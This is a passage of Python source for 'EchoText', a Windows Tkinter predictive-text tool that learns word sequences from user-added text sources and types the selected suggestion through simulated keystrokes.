("dwFlags", ctypes.c_ulong),
("time",ctypes.c_ulong),
("dwExtraInfo", PUL)]
class Input_I(ctypes.Union):
_fields_ = [("ki", KeyBdInput),
("mi", MouseInput),
("hi", HardwareInput)]
class Input(ctypes.Structure):
_fields_ = [("type", ctypes.c_ulong),
("ii", Input_I)]
def PressKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, win32api.MapVirtualKey(hexKeyCode, MAPVK_VK_TO_VSC), 0x0008, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
return
def ReleaseKey(hexKeyCode):
extra = ctypes.c_ulong(0)
ii_ = Input_I()
ii_.ki = KeyBdInput( 0, win32api.MapVirtualKey(hexKeyCode, MAPVK_VK_TO_VSC), 0x0008 | win32con.KEYEVENTF_KEYUP, 0, ctypes.pointer(extra) )
x = Input( ctypes.c_ulong(1), ii_ )
ctypes.windll.user32.SendInput(1, ctypes.pointer(x), ctypes.sizeof(x))
return
def SetKeyStateUp(hexKeyCode):
if win32api.GetAsyncKeyState(hexKeyCode) != 0:
ReleaseKey(hexKeyCode)
return
def SetKeyStateDown(hexKeyCode):
if win32api.GetAsyncKeyState(hexKeyCode) == 0:
PressKey(hexKeyCode)
return
# Create "sources" directory if it doesn't exist
if not os.path.exists("sources"):
os.makedirs("sources")
# Function to save updated functions on the fly
def save_settings(settingsObj):
settings_file = open("settings.json", "w")
settings_file.write(json.dumps(settingsObj))
settings_file.close()
# Try to load settings file
# If unsuccessful, create one
# Default settings
default_settings = { "keep_window_on_top" : TRUE, "make_window_transparent" : FALSE, "version": "1.1" }
settings = {}
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/settings.json"):
openedFile = open("settings.json", "r")
fileText = openedFile.read()
# Now try to JSON decode our read file text
try:
settings = json.loads(fileText)
except ValueError:
settings = default_settings
save_settings(default_settings)
else:
openedFile = open("settings.json", "w")
fileText = json.dumps(default_settings)
openedFile.write(fileText)
settings = json.loads(fileText)
openedFile.close()
# Function to save updated sources on the fly
def save_sources(sourcesObj):
sources_file = open("sources.json", "w")
sources_file.write(json.dumps(sourcesObj))
sources_file.close()
return
# Load the list of sources from sources.json
default_sources = { "version" : "1.1", "sources_list" : [] }
sources_list = {}
openedFile = {}
fileText = ""
if os.path.isfile(os.path.dirname(os.path.realpath(__file__)) + "/sources.json"):
openedFile = open("sources.json", "r")
fileText = openedFile.read()
# Try to decode JSON
try:
sources_list = json.loads(fileText)
except ValueError:
sources_list = default_sources
save_sources(default_sources)
else:
openedFile = open("sources.json", "w")
fileText = json.dumps(default_sources)
openedFile.write(fileText)
sources_list = json.loads(fileText)
openedFile.close()
# Create object that is the combination of all loaded sources
source_master_object = {}
# Figure out window dimensions
window_width = 400
window_height = 200
# Figure out starting x-y position on the screen
window_initial_x_offset = win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] - window_width - 100
window_initial_y_offset = win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] - window_height - 100
# Initialize window/root object
root = Tk()
# Set the window's icon
root.tk.call("wm", "iconbitmap", root._w, "-default", "icon.ico")
# Set the window's title too
root.wm_title("echotext")
# Set as non-resizable
root.resizable(width = FALSE, height = FALSE)
# Position the window on the screen
root.geometry(str(window_width) + "x" + str(window_height) + "+" + str(window_initial_x_offset) + "+" + str(window_initial_y_offset))
# Keep the window above all others based on setting
if settings["keep_window_on_top"] == TRUE:
root.wm_attributes("-topmost", "1")
# Set window transparency based on setting
if settings["make_window_transparent"] == TRUE:
root.wm_attributes("-alpha", 0.7)
# Functions for menu bar buttons
def menu_bar_input_button():
# Input button pressed
sources_frame.pack_forget()
input_frame.pack(fill = BOTH, expand = TRUE)
return
def menu_bar_sources_button():
# Sources button pressed
input_frame.pack_forget()
sourceframe_background_clicked( None )
sources_frame.pack(fill = BOTH, expand = TRUE)
return
def menu_bar_add_source_button():
global add_source_dialog, source_text_entry_frame, source_text_entry_field_scrollbar, \
source_text_entry_field, source_meta_entry_frame, source_name_entry_field, source_create_ok_buttton, root
# "Add Source" button pressed
# Create a new top-level dialog window
add_source_dialog = Toplevel()
add_source_dialog.title("Add Source Text")
add_source_dialog.resizable(width = FALSE, height = FALSE)
add_source_dialog.config(background = "black")
add_source_dialog.geometry("640x480+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (640 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (480 / 2))))
# Format the grid pattern for the encompassing frames
add_source_dialog.grid_rowconfigure(0, weight = 4)
add_source_dialog.grid_rowconfigure(1, weight = 1)
add_source_dialog.grid_columnconfigure(0, weight = 1)
# Create the frame that will house the text material entry field
source_text_entry_frame = Frame(master = add_source_dialog, background = "black")
source_text_entry_frame.grid(row = 0, column = 0, padx = 6, pady = 3)
# Create the frame that will house the name entry field and "OK" button
source_meta_entry_frame = Frame(master = add_source_dialog, background = "black")
source_meta_entry_frame.grid(row = 1, column = 0, padx = 6, pady = 3)
# Create the vertical scrollbar that goes in that text field
source_text_entry_field_scrollbar = Scrollbar(master = source_text_entry_frame)
source_text_entry_field_scrollbar.pack(side = RIGHT, fill = Y)
# Create the text entry field for entering raw text data
source_text_entry_field = Text(master = source_text_entry_frame)
source_text_entry_field.config(wrap = WORD, font = "Arial 12")
source_text_entry_field.insert(CURRENT, "Enter your human-readable text here.")
source_text_entry_field.pack(side = LEFT, expand = TRUE)
# "Attach" the text field and scrollbar to each other
source_text_entry_field_scrollbar.config( command = source_text_entry_field.yview )
source_text_entry_field.config( yscrollcommand = source_text_entry_field_scrollbar.set )
# Format the grid pattern for the meta entry fields
source_meta_entry_frame.grid_rowconfigure(0, weight = 1)
source_meta_entry_frame.grid_columnconfigure(0, weight = 3)
source_meta_entry_frame.grid_columnconfigure(1, weight = 1)
# Create the reference name entry box below the text entry one
source_name_entry_field = Entry(master = source_meta_entry_frame, width = 24)
source_name_entry_field.insert(INSERT, "Source name")
source_name_entry_field.grid(row = 0, column = 0, padx = 6, pady = 3, sticky = N+S+E+W)
# Create the button that will finish the reference creation process
source_create_ok_buttton = Button(master = source_meta_entry_frame, text = "Create Source", command = source_create_ok_clicked)
source_create_ok_buttton.grid(row = 0, column = 1, padx = 6, pady = 3, sticky = N+S+E+W)
add_source_dialog.wm_transient(master = root)
add_source_dialog.focus_set()
add_source_dialog.grab_set()
return
def menu_bar_about_button():
tkinter.messagebox.showinfo("About", "\"EchoText\" version one point one\n\nechotext is released under the MIT license\n\
https://opensource.org/licenses/MIT\n\nDeveloped by Neil Flodin <neil@neilflodin.com>")
return
# Handler functions from the "Add Source" dialog
def source_create_ok_clicked():
global add_source_dialog, source_text_entry_frame, source_text_entry_field_scrollbar, \
source_text_entry_field, source_meta_entry_frame, source_name_entry_field, source_create_ok_buttton
# Trim the whitespace off of the entered name
source_name_entry_field_newname = source_name_entry_field.get().strip()
source_name_entry_field.delete(0, END)
source_name_entry_field.insert(0, source_name_entry_field_newname)
# Check if source name exceeds maximum length
if len( source_name_entry_field_newname ) > 24:
tkinter.messagebox.showerror("Name Too Long", "The name you entered for the new source is over 24 characters long. Shorten it before you continue.")
return
# Check if source name matches an already created name
for source_item in sources_list["sources_list"]:
if source_item["source_name"] == source_name_entry_field_newname:
tkinter.messagebox.showerror("Name Already Used", "There is already a source that has that same name. Please enter another one.")
return
# Check to make sure name is legit for Windows
for character in source_name_entry_field_newname:
if character == '\\' or character == '/' or character == ':' or character == '*' or character == '?' or \
character == '"' or character == '<' or character == '>' or character == '|':
# Can't use the name
tkinter.messagebox.showerror("Name Invalid", "Source names cannot contain any of the following characters:\n\\/:*?\"<>|\nPlease enter another source name.")
return
# Create a loading screen while the data is added to databases
loading_dialog = Toplevel()
loading_dialog.title("Please wait...")
loading_dialog.resizable(width = FALSE, height = FALSE)
loading_dialog.config(background = "black")
loading_dialog.wm_attributes("-disabled", "1")
loading_dialog.geometry("300x200+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (300 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (200 / 2))))
loading_dialog_label = Label(loading_dialog, text = "Adding and sorting text into personal database...\nPlease wait...", justify = CENTER, background = "black", foreground = "white")
loading_dialog_label.place(relx = 0.5, rely = 0.5, anchor = CENTER)
loading_dialog.wm_transient(master = root)
loading_dialog.focus_set()
loading_dialog.grab_set()
# Split raw text into sentences
raw_text = source_text_entry_field.get("1.0", END)
split_sentence_list = re.split("[;,.!?:]\s*", raw_text)
empty_sentences_removed_list = []
for chunk in split_sentence_list:
# If, after removing the sentence's whitespace, the sentence is not empty, add it to empty_sentences_removed_list
if chunk.strip() != "":
# Add stripped sentence to new array
empty_sentences_removed_list.append(chunk.strip())
# Now we have an array of every individual sentence
new_source_json_data = { "version" : "1.1", "top_word_list" : {} }
# Do following for every sentence that will be parsed
for sentence_index in range(0, len( empty_sentences_removed_list )):
# Split the sentence into individual words by removing spaces
current_sentence_split = empty_sentences_removed_list[sentence_index].split()
# Do following for every word in the current sentence being parsed
for word_index in range(0, len( current_sentence_split )):
# If a top_word_list word entry doesn't already exist for the current word being parsed, create one
if current_sentence_split[ word_index ] in new_source_json_data["top_word_list"]:
# Increase top-level total_frequency by one
new_source_json_data["top_word_list"][current_sentence_split[ word_index ]]["total_frequency"] += 1
else:
new_source_json_data["top_word_list"][current_sentence_split[ word_index ]] = { "subsequent_words" : [], "total_frequency" : 1 }
# If the word_index isn't 0, that means the current word has a word before it
# We can add this word as a "subsequent_word"
if word_index > 0:
new_subsequent = True
for subseq_listitem_index in range(0, len( new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"] )):
if new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"][subseq_listitem_index]["word_name"] == current_sentence_split[word_index]:
new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"][subseq_listitem_index]["subseq_frequency"] += 1
new_subsequent = False
break
# New subseq
if new_subsequent == True:
new_source_json_data["top_word_list"][current_sentence_split[ word_index - 1 ]]["subsequent_words"].append( \
{ "word_name" : current_sentence_split[word_index], "subseq_frequency" : 1 })
# Add this new source to sources_list and save that file
sources_list["sources_list"].append({ "source_name" : source_name_entry_field_newname, "source_selected" : 1 })
save_sources(sources_list)
# Save tje new source JSON data as a JSON file
new_source_file = open("sources/" + source_name_entry_field_newname + ".json", "w")
new_source_file.write(json.dumps(new_source_json_data))
new_source_file.close()
# Return to the main window
loading_dialog.destroy()
add_source_dialog.destroy()
update_sources()
return
# Add the menu for switching between views
menu_bar = Menu(root)
menu_bar.add_command(label = "Input", command = menu_bar_input_button)
menu_bar.add_command(label = "Sources", command = menu_bar_sources_button)
menu_bar.add_command(label = "Add Source", command = menu_bar_add_source_button)
menu_bar.add_command(label = "About", command = menu_bar_about_button)
root.config(menu = menu_bar)
# Create the frame object for the keyboard input view
input_frame = Frame(master = root, background = "black", padx = 3, pady = 3)
input_frame.pack(fill = BOTH, expand = TRUE)
# Define the function called when a keyboard input button is pressed
keyEntryEnabled = True
def enterTextFromSuggestion( index ):
global keyEntryEnabled, current_word, previous_word
if index < len( suggestions ):
keyEntryEnabled = False
# Get the remainder of the word to be entered
wordToEnter = suggestions[ index ]
restOfCurrentWord = wordToEnter[ len( current_word ) : ]
# Lift up the keys that were pressed in order to activate this function
SetKeyStateUp(ord( str( index + 1 )[0] ))
# Lift up the keys that can affect keyboard input so that the simulated input isn't messed up
SetKeyStateUp(win32con.VK_LSHIFT)
SetKeyStateUp(win32con.VK_RSHIFT)
SetKeyStateUp(win32con.VK_LCONTROL)
SetKeyStateUp(win32con.VK_RCONTROL)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateUp(win32con.VK_RMENU)
# For each character in the text to be entered, get its modifier
# Convert modifier to hex string, and query that string for keys to be held down and the
# key to be typed in
for char in restOfCurrentWord:
keyScanEx = win32api.VkKeyScanEx(char, 0)
keyModifier = [keyScanEx >> i & 0xff for i in (8,0)][0]
keyVKCode = [keyScanEx >> i & 0xff for i in (8,0)][1]
if keyModifier != -1:
# Key entered is able to be entered with the keyboard
if keyModifier == 1:
# Shift key must be pressed down when typing the letter
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LSHIFT)
SetKeyStateDown(win32con.VK_LSHIFT)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LSHIFT)
elif keyModifier == 2:
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LCONTROL)
SetKeyStateDown(win32con.VK_LCONTROL)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LCONTROL)
elif keyModifier == 4:
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_LMENU)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
SetKeyStateUp(win32con.VK_LMENU)
else:
SetKeyStateUp(keyVKCode)
SetKeyStateDown(keyVKCode)
SetKeyStateUp(keyVKCode)
# Add a space after the word
SetKeyStateUp(win32con.VK_SPACE)
SetKeyStateDown(win32con.VK_SPACE)
SetKeyStateUp(win32con.VK_SPACE)
previous_word = wordToEnter
current_word = ""
update_suggestions()
# Allow again for natural key pressed
keyEntryEnabled = True
return
# Adjust input_frame grid pattern
input_frame.grid_rowconfigure(0, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(1, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(2, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(3, minsize = 30, weight = 1)
input_frame.grid_rowconfigure(4, minsize = 30, weight = 1)
input_frame.grid_columnconfigure(0, minsize = 48, weight = 1)
input_frame.grid_columnconfigure(1, minsize = 300, weight = 6)
# Create each label for the other key information top to bottom
keyInfoLabelList = []
keyInfoLabelList.append( Label( input_frame, text = "Alt + 1", background = "black", foreground = "white" ) )
keyInfoLabelList[0].grid(row = 0, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 2", background = "black", foreground = "white" ) )
keyInfoLabelList[1].grid(row = 1, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 3", background = "black", foreground = "white" ) )
keyInfoLabelList[2].grid(row = 2, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 4", background = "black", foreground = "white" ) )
keyInfoLabelList[3].grid(row = 3, column = 0, sticky = W)
keyInfoLabelList.append( Label( input_frame, text = "Alt + 5", background = "black", foreground = "white" ) )
keyInfoLabelList[4].grid(row = 4, column = 0, sticky = W)
# Create each button that will occupy the keyboard input frame
def keyInputButtonPressed( index ):
keyEntryEnabled = False
SetKeyStateUp(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_LMENU)
SetKeyStateDown(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_TAB)
SetKeyStateUp(win32con.VK_LMENU)
keyEntryEnabled = True
enterTextFromSuggestion( index )
return
keyInputButtonList = []
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 0 ) ))
keyInputButtonList[0].grid( row = 0, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 1 ) ))
keyInputButtonList[1].grid( row = 1, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 2 ) ))
keyInputButtonList[2].grid( row = 2, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 3 ) ))
keyInputButtonList[3].grid( row = 3, column = 1, padx = 3, pady = 3, sticky = E+W )
keyInputButtonList.append(Button(input_frame, text = "", borderwidth = 3, command = lambda: keyInputButtonPressed( 4 ) ))
keyInputButtonList[4].grid( row = 4, column = 1, padx = 3, pady = 3, sticky = E+W )
# Create the frame object for the sources view
sources_frame = Frame(master = root, background = "black")
sources_frame.grid_rowconfigure(0, weight = 4)
sources_frame.grid_rowconfigure(1, weight = 1)
sources_frame.grid_columnconfigure(0, weight = 1)
# Create the frame for the bottom part of the UI
sources_bottom_ui_frame = Frame(master = sources_frame, background = "black")
sources_bottom_ui_frame.grid(row = 1, column = 0, sticky = N+S+W+E)
sources_bottom_ui_frame.grid_columnconfigure(0, weight = 1)
sources_bottom_ui_frame.grid_columnconfigure(1, weight = 1)
# Create the sources display buttons frame below the display
sources_display_buttons_frame = Frame(master = sources_bottom_ui_frame, background = "black")
sources_display_buttons_frame.grid(row = 0, column = 0)
sources_display_buttons_frame.grid_columnconfigure(0, minsize = 75, weight = 1)
sources_display_buttons_frame.grid_columnconfigure(1, minsize = 75, weight = 1)
# Callback function for rename source button
newNameDialog = None
newNameDialogText = None
newNameDialogButton = None
def rename_source_button_inner_clicked():
global newNameDialog, newNameDialogText, newNameDialogButton
newName = newNameDialogText.get().strip()
if newName != None:
if len( newName ) <= 24:
for source_item in sources_list["sources_list"]:
if source_item["source_name"] == newName:
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Already Used", "There is already a source that has that same name. Please enter another one.")
return
for character in newName:
if character == '\\' or character == '/' or character == ':' or character == '*' or character == '?' or character == '"' or character == '<' or character == '>' or character == '|':
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Invalid", "Source names cannot contain any of the following characters:\n\\/:*?\"<>|\nPlease enter another source name.")
return
# Name is OK
os.rename( "sources/" + sources_list["sources_list"][source_element_selected_index]["source_name"] + ".json", "sources/" + newName + ".json" )
sources_list["sources_list"][source_element_selected_index]["source_name"] = newName
save_sources( sources_list )
update_sources()
tkinter.messagebox.showinfo("Source Renamed", "The source has been renamed to \"" + newName + "\".")
newNameDialog.destroy()
return
else:
newNameDialogText.selection_range( 0, END )
tkinter.messagebox.showerror("Name Too Long", "The new name is over 24 characters long. Shorten it before you continue.")
return
return
def rename_source_button_clicked():
global newNameDialog, newNameDialogText, newNameDialogButton, root, sources_list
if source_element_selected_index != None:
newNameDialog = Toplevel()
newNameDialog.title( "Rename Source" )
newNameDialog.resizable( width = FALSE, height = FALSE )
newNameDialog.config( background = "black" )
newNameDialog.geometry("200x50+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][2] / 2) \
- (200 / 2))) + "+" + str(int((win32api.GetMonitorInfo(win32api.EnumDisplayMonitors()[0][0])["Work"][3] / 2) - (50 / 2))))
# Create the text entry field
newNameDialogText = Entry( master = newNameDialog, width = 24 )
newNameDialogText.insert( INSERT, sources_list["sources_list"][source_element_selected_index]["source_name"] )
newNameDialogText.pack( side = TOP, fill = X, padx = 4, pady = 3 )
# Create the button
newNameDialogButton = Button( master = newNameDialog, text = "Rename Source", command = rename_source_button_inner_clicked )
newNameDialogButton.pack( side = BOTTOM, fill = BOTH, padx = 4, pady = 3 )
newNameDialog.wm_transient( master = root )
newNameDialog.focus_set()
newNameDialog.grab_set()
return
# Callback function for delete source button
def delete_source_button_clicked():
if source_element_selected_index != None:
deletedSourceName = sources_list["sources_list"][source_element_selected_index]["source_name"]
if tkinter.messagebox.askokcancel( "Delete Source", "This will permanently delete the source \"" + deletedSourceName + "\". Are you sure you want to continue?" ):
# Delete the source
os.remove( "sources/" + deletedSourceName + ".json" )
sources_list["sources_list"].pop( source_element_selected_index )
save_sources( sources_list )
update_sources()
tkinter.messagebox.showinfo("Source Deleted", "The source \"" + deletedSourceName + "\"has been deleted.")
return
# Create the rename button for the sources display frame above
rename_source_button = Button(sources_display_buttons_frame, text = "Rename", borderwidth = 3, command = rename_source_button_clicked)
rename_source_button.grid(row = 0, column = 0, sticky = N+S+W+E)
# Create the delete button for the sources display frame above
delete_source_button = Button(sources_display_buttons_frame, text = "Delete", borderwidth = 3, command = delete_source_button_clicked)
delete_source_button.grid(row = 0, column = 1, sticky = N+S+W+E)
# Create the global settings frame below the display
global_settings_frame = Frame(master = sources_bottom_ui_frame, background = "black")
global_settings_frame.grid(row = 0, column = 1, sticky = N+S+E)
# Create the "keep window on top" label
keep_window_on_top_label = Label(global_settings_frame, text = "Keep this window on top?", background = "black", foreground = "white")
keep_window_on_top_label.grid(row = 0, column = 0, sticky = N+S+E)
# Create the "make this window transparent" label
make_window_transparent_label = Label(global_settings_frame, text = "Make this window transparent?", background = "black", foreground = "white")
make_window_transparent_label.grid(row = 1, column = 0, sticky = N+S+E)
# Callback functions if one of the checkbuttons is toggled
def keep_window_on_top_checkbutton_toggled():
root.wm_attributes("-topmost", keep_window_on_top_checkbutton_selected.get())
settings["keep_window_on_top"] = keep_window_on_top_checkbutton_selected.get()
save_settings(settings)
return
def make_window_transparent_checkbutton_toggled():
if make_window_transparent_checkbutton_selected.get():
root.wm_attributes("-alpha", 0.7)
else:
root.wm_attributes("-alpha", 1.0)
settings["make_window_transparent"] = make_window_transparent_checkbutton_selected.get()
save_settings(settings)
return
# Create the "keep window on top" checkbutton
keep_window_on_top_checkbutton_selected = IntVar()
keep_window_on_top_checkbutton = Checkbutton(global_settings_frame, background = "black", \
foreground = "black", highlightbackground = "black", activebackground = "black", activeforeground = "black", \
variable = keep_window_on_top_checkbutton_selected, command = keep_window_on_top_checkbutton_toggled)
if settings["keep_window_on_top"]:
keep_window_on_top_checkbutton.select()
else:
keep_window_on_top_checkbutton.deselect()
keep_window_on_top_checkbutton.grid(row = 0, column = 1, sticky = N+S+E)
# Create the "make this window transparent" checkbutton
make_window_transparent_checkbutton_selected = IntVar()
make_window_transparent_checkbutton = Checkbutton(global_settings_frame, background = "black", \
foreground = "black", highlightbackground = "black", activebackground = "black", activeforeground = "black", \
variable = make_window_transparent_checkbutton_selected, command = make_window_transparent_checkbutton_toggled)
if settings["make_window_transparent"]:
make_window_transparent_checkbutton.select()
else:
make_window_transparent_checkbutton.deselect()
make_window_transparent_checkbutton.grid(row = 1, column = 1, sticky = N+S+E)
# Keyboard input
# Store the previous entered word in order to help prediction results
previous_word = "" # <---- Can be empty
current_word = ""
left_alt_down = False
right_alt_down = False
def on_keyboard_down_event( event ):
global current_word, previous_word, left_alt_down, right_alt_down, keyEntryEnabled
if keyEntryEnabled:
if event.Key == "Lmenu":
left_alt_down = True
elif event.Key == "Rmenu":
right_alt_down = True
elif event.Key == "Space":
# Space
previous_word = current_word.strip()
current_word = ""
update_suggestions()
elif event.Key == "Back":
# Back
# Remove the end character from current_word
if len(current_word) > 0:
current_word = current_word[:len(current_word) - 1]
update_suggestions()
else:
if event.Ascii >= 33 and event.Ascii <= 254 and event.Ascii != 127 \
and left_alt_down == False and right_alt_down == False:
# If the letter entered is a "sentence ender", clear previous_word so that
# suggestions are refreshed from the top level
if event.Ascii == '.' or event.Ascii == '?' or event.Ascii == '!':
previous_word = ""
current_word = ""
else:
# Append the ASCII version of the key to the end of current_word
current_word = current_word + str(chr(event.Ascii))
update_suggestions()
return True
def on_keyboard_up_event( event ):
global left_alt_down, right_alt_down, keyEntryEnabled
if keyEntryEnabled:
if event.Key == "Lmenu":
left_alt_down = False
elif event.Key == "Rmenu":
right_alt_down = False
elif event.Ascii >= 49 and event.Ascii <= 53:
# It's one of the 1-5 numeric keys; test for alt key to maybe enter predicted text
if left_alt_down == True:
# Act as though one of the 5 buttons was pressed
SetKeyStateUp(win32con.VK_LMENU)
enterTextFromSuggestion( int( chr( event.Ascii ) ) - 1 ) # Minus one because 1 maps to 0, 2 maps to 1, etc. for this function
SetKeyStateDown(win32con.VK_LMENU)
elif right_alt_down == True:
# Act as though one of the 5 buttons was pressed
SetKeyStateUp(win32con.VK_RMENU)
enterTextFromSuggestion( int( chr( event.Ascii ) ) - 1 ) # Minus one because 1 maps to 0, 2 maps to 1, etc. for this function
SetKeyStateDown(win32con.VK_RMENU)
return True
# Functions usefol when updating and sorting word suggestions
def get_master_word_list_sorted_by_total_frequency():
source_master_list = []
for master_word_key in source_master_object:
source_master_list.append( { "name" : master_word_key, \
"subsequent_words" : source_master_object[master_word_key]["subsequent_words"], \
"total_frequency" : source_master_object[master_word_key]["total_frequency"] } )
source_master_list.sort( key = lambda word : word[ "total_frequency" ], reverse = True )
return source_master_list
def get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words_list ):
source_master_list = []
for master_word_key in source_master_object:
source_master_list.append( { "name" : master_word_key, \
"subsequent_words" : source_master_object[master_word_key]["subsequent_words"], \
"total_frequency" : source_master_object[master_word_key]["total_frequency"] } )
source_master_list.sort( key = lambda word : word[ "total_frequency" ], reverse = True )
return [ item for item in source_master_list if not item["name"] in removed_words_list ]
suggestions = []
def update_suggestions():
global source_master_object, current_word, previous_word, suggestions
# Get the top five suggestions based on previous_word and what's currently in current_word
del suggestions[:]
suggestions = []
# Test if we can use previous_word for predictions
if previous_word in source_master_object:
# Word is in source_master_object so we can look at subsequent words
# First, get subsequent_words whose first letters match current_word, rank those by subseq_frequency, then
# second, rank remaining subsequent_words by subseq_frequency and add those to the rank.
# Finally, if those words don't fill the 5 recommendation bars, rank the top list similarly to below
prev_word_subsequent_words = source_master_object[ previous_word ][ "subsequent_words" ]
# Divide subsequent_words into two further arrays: one that contains words with beginning characters
# that match those entered in current_word, and an array of those words which don't match.
# The first array is where the initial predictions will come from, and then the second array (Both sorted
# by "frequency" variable) and then the global words object with these words taken out, sorted
# by "total_frequency"
removed_words = []
prev_word_subsequent_words_matching = []
for listitem in prev_word_subsequent_words:
if listitem["word_name"].lower().find( current_word.lower() ) == 0:
removed_words.append( listitem["word_name"] )
prev_word_subsequent_words_matching.append( listitem )
# Sort each array by subseq_frequency
prev_word_subsequent_words_matching.sort( key = lambda word : word[ "subseq_frequency" ], reverse = True )
# Populate suggestions array with matching words
for listitem in prev_word_subsequent_words_matching:
suggestions.insert( len( suggestions ), listitem["word_name"] )
# If still not full, populate suggestions with words matching current_word from toplevel
# without including removed_words. This list is sorted by frequency.
toplevel_matching_words_sans_removed_words = []
if len( suggestions ) < 5:
for word in source_master_object:
# First test to make sure the word hasn't already been removed from "suggestables"...
if not word in removed_words:
# Test to see if the word could possibly overlap with current_word
if word.lower().find( current_word.lower() ) == 0:
removed_words.append( word )
toplevel_matching_words_sans_removed_words.append( word )
# Sort the matching toplevel words by frequency in source_master_object
toplevel_matching_words_sans_removed_words.sort( key = lambda word : source_master_object[ word ][ "total_frequency" ], reverse = True )
for word_index in range( 0, len( toplevel_matching_words_sans_removed_words ) ):
suggestions.insert( len( suggestions ), toplevel_matching_words_sans_removed_words[ word_index ] )
# If suggestions STILL isn't full, populate it with words from the toplevel list
# sorted by total frequency
if len( suggestions ) < 5:
for listitem in get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words ):
if not len( suggestions ) < 5:
break
suggestions.insert( len( suggestions ), listitem["name"] )
else:
# Just get source_master_object words whose first letters match current_word, rank these by total_frequency,
# and append to the end of those the remaining words sorted by frequency
name_frequency_pairs = []
removed_words = []
for word in source_master_object:
# Check if current_word matches first letters of this word
if word.lower().find( current_word.lower() ) == 0:
name_frequency_pairs.append( { "name" : word, "frequency" : source_master_object[ word ][ "total_frequency" ] } )
# Add this matching word to "removed_words"
removed_words.append( word )
# Sort name_frequency_pairs
name_frequency_pairs.sort( key = lambda word : word[ "frequency" ], reverse = True )
# Copy values from name_frequency_pairs to suggestions
for pair_index in range( 0, len( name_frequency_pairs ) ):
suggestions.insert( pair_index, name_frequency_pairs[ pair_index ][ "name" ] )
# Fill the rest of the remaining suggestions array with words from master list
# sorted by total_frequency
if len( suggestions ) < 5:
for listitem in get_master_word_list_sorted_by_total_frequency_sans_removed_words( removed_words ):
if not len( suggestions ) < 5:
break
suggestions.insert( len( suggestions ), listitem["name"] )
# Update label values based on suggestions
for label_index in range( 0, 5 ):
if label_index < len( suggestions ):
keyInputButtonList[ label_index ].config( text = suggestions[ label_index ] )
else:
keyInputButtonList[ label_index ].config( text = "" )
return
# Store the source element activated checkbox values
source_element_activated_variablelist = []
# Initialize the variable for sources_info_display_frame
sources_info_display_frame = None
# Variable that defines which item in the source list is selected
source_element_selected_index = None
# Initialize the lists that hold each label/checkbutton widget combo from the source list display
source_elements_label_widget_list = []
source_elements_checkbutton_widget_list = []
# Function for when a source element checkbox is toggled
def source_element_checkbutton_toggled():
global source_element_selected_index, source_elements_checkbutton_widget_list, source_element_activated_variablelist
for source_index3 in range( 0, len( sources_list["sources_list"] )):
sources_list[ "sources_list" ][ source_index3 ][ "source_selected" ] = source_element_activated_variablelist[ source_index3 ].get()
save_sources( sources_list )
update_source_masterobject()
return
# Function callback for source element label clicked by mouse
def source_element_label_widget_clicked( event ):
global source_element_selected_index, source_elements_label_widget_list, source_elements_checkbutton_widget_list
for source_index2 in range( 0, len( sources_list["sources_list"] )):
if source_elements_label_widget_list[ source_index2 ] == event.widget:
source_elements_label_widget_list[ source_index2 ].config( background = "blue", foreground = "white" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "blue", activebackground = "blue", highlightbackground = "blue" )
source_element_selected_index = source_index2
else:
source_elements_label_widget_list[ source_index2 ].config( background = "white", foreground = "black" )
source_elements_checkbutton_widget_list[ source_index2 ].config( background = "white", activebackground = "white", highlightbackground = "white" )
